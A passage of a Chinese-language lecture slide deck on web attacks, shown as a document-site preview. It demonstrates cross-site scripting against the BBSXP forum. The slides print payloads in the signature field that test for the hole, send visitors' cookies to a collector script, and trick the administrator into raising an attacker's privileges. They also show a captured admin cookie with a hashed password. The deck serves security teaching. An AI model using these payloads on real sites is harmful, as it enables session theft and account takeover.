文档详情

Web攻击.ppt

发布:2016-12-01约字共60页下载文档
文本预览下载声明
网络攻击 针对WEB的攻击 针对Web服务器的攻击 利用Web服务器的漏洞进行攻击, 如IIS缓冲区溢出漏洞利用、目录遍历漏洞利用等 利用网页自身的安全漏洞进行攻击, 如SQL注入,跨站脚本攻击等 此两类攻击均属于网站未对用户输入进行安全验证而导致 国际组织OWASP(Open Web Application Security Project ) 的统计,跨站脚本攻击和SQL注入排在前两位 跨站脚本攻击 跨站脚本攻击概述 跨站脚本攻击过程 跨站脚本攻击实例 防御跨站脚本攻击 跨站脚本攻击概述 什么是XSS攻击 跨站脚本攻击的危害 跨站脚本攻击发起条件 检测漏洞 默认情况下,BBSXP是允许用户在个性签名里使用[img][/img]标签的。 说明[img][/img]并不是标准的html标签,当用户输入: [img]/bbsxp/1.gif[/img] 时,论坛程序会把它转换为标准的html代码: img src=“/bbsxp/1.gif” 检测漏洞(2) 我们在个性签名里输入: [img]javascript:alert(55)[/img] 则浏览帖子时,会弹出一个提示框,结果见下页图,说明此处存在XSS漏洞。 检测漏洞(3) 漏洞利用 我们可以利用这个漏洞来盗取用户的cookie信息。 把用户linzi的签名档设置为: [img]javascript:window.location=#x27/cgi-bin/cookie.cgi?#x27+document.cookie[/img] 说明:因为网站对’字符进行了过滤,所以必须把’编码为#x27;window.location的作用是使网页自动跳转到另一个页面;document.cookie的作用是读取cookie。 用户浏览了该页面后,会自动跳转到/cgi-bin/cookie.cgi,并把自己的cookie信息传递给该页面。 漏洞利用(2) 当其他用户查看了linzi发表的帖子之后,就会把自己的cookie发送到并显示。 下面显示的是admin用户的cookie信息。 Your Cookie is skins=1;%20ASPSESSIONIDASASARSS=LNANGINCJAPAINAMCPMEGOPN;%20eremite=0;%20userpass=21232F297A57A5A743894A0E4A801FC3;%20username=admin;%20onlinetime=2007%2D9%2D29+16%3A31%3A05;%20addmin=10 漏洞利用(3) Cookie中含有session、userpass(经过加密)、username等信息。 攻击者得到这段cookie之后,就可以用来分析受害者的password和session等信息了。 漏洞利用(4) 用户还可以利用此XSS漏洞来提升权限。 假如,超级管理员要修改用户linzi为社区区长,那么他向web服务器发送的请求是: 3/bbsxp/admin_user.asp?menu=userokusername=linzimembercode=5userlife=1posttopic=3money=9postrevert=0savemoney=0deltopic=1regtime=2005-9-1+1%3A1%3A1experience=9country=%D6%D0%B9%FASubmit=+%B8%FC+%D0%C2+ 漏洞利用(5) 但是,如果攻击者想自己把自己的权限提升,那么可以利用此XSS漏洞。 我们可以在linzi的个性签名里构造一段代码,令访问者转向刚才的页面,然后诱使超级管理员查看linzi的个性签名,那么linzi的用户权限就得到了提升。 我们构造的代码是: [img]javascript:window.location=#x273/bbsxp/admin_user.asp?menu=userokusername=linzimembercode=5userlife=1posttopic=3regtime=2005-9-1+1%3A1%3A1experience=9country=%D6%D0%B9%FASubmit=+%B8%FC+%D0%C2+#x27[/img] 漏洞利用(6) Linzi设置好个性签名后,超级管理员一旦访问了linzi的帖子,就会把linzi提升为社区区长。 说明,此论坛对个性签名的长度设置了限制,如果长度超过,可以在给admin_user.asp传递的参数中删除一些不重要的参数。 防御跨站脚本攻击 XSS攻击最主要目标不是Web服务器本身,而是登录网站的用户。 针对XSS攻击,分析对普通浏览网页用户及WEB应用开发者给出的安全
显示全部
相似文档